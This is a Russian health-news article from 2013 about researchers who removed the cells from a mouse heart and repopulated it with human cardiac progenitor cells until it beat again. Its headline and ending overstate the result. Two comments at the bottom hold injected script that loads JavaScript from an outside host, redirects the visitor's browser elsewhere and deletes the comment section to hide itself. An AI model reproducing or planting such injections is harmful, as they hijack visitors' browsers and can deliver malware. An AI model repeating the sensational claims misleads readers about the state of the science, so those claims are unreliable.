Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Сенсация! Ученые сумели п...  >>  Сенсация! Ученые сумели превратить мышиное сердце в человеческое!
 
Обратная связь
 

Сенсация! Ученые сумели превратить мышиное сердце в человеческое!

Размер шрифта
03 октября 2013 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Впервые сердце начало биться снова после того, как умершие клетки заменили новыми!

Сенсация! Ученые сумели превратить мышиное сердце в человеческое!

«Каждые 30 секунд от сердечно-сосудистых заболеваний умирает один человек; более 5 миллионов человек страдает сердечной недостаточностью прямо сейчас», – рассказывает один из авторов исследования Лей Янг из Питтсбургского университета (США). «Более чем у половины пациентов лечение оказывается неэффективным, а донорских органов не хватает».

Для того чтобы решить эту проблему, ученые пытались найти возможность заменить поврежденный участок сердечной мышцы или целое сердце с помощью восстановительных технологий. В ходе эксперимента ученые удалили из мышиного сердца все клетки (процедура длилась 10 часов). После этого на место удаленных клеток ученые подсадили клетки-предшественники человеческого сердца.

Клетки-предшественники в дальнейшем могут превратиться в кардиомиоциты (особые мышцы сердца), эндотелиальные клетки (выстилающие внутреннюю поверхность) и гладкомышечные клетки. Ранее никто не использовал клетки-предшественники для регенерации сердца. Оказалось, что внеклеточный матрикс, который остался после удаления клеток, посылает сигналы клеткам-предшественникам, благодаря чему они приобретают необходимые функции.

Спустя несколько недель удалось восстановить не только структуру мышиного сердца, но и его работу: оно стало биться с частотой 40-50 ударов в минуту. Ученым предстоит еще много работы по оптимизации работы сердца и восстановлению проводящей системы, однако, первый этап уже пройден. Не исключено, что в дальнейшем клетки-предшественники пациентов можно будет использовать для создания органов для трансплантации. Следующим этапом будет создание «заплаты», которую можно будет использовать для замещения участка сердечной мышцы, пострадавшей после инфаркта миокарда.

Такими темпами уже на нашем с вами веку врачи смогут дарить людям жизнь и воскрешать их из мертвых!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:01

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 23:01

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Еще один повод ходить на работу! Бедные умирают в 2 раза чаще богатых!   Как угробить свое сердце?!   Получите на орехи! Грецкие орехи спасут от инфаркта   У вас больное сердце! Нет? А если нагнуться?  
22 июня 2013Грецкие орехи спасут от инфаркта 18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя?
 
20 июня 2013Собака спасет от инфаркта! Какую породу завести, чтобы не умереть 12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого?
 

Слайдшоу

1
Зачем спать 10 затем
Что заставит вас храпеть
Чем полезен секс?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.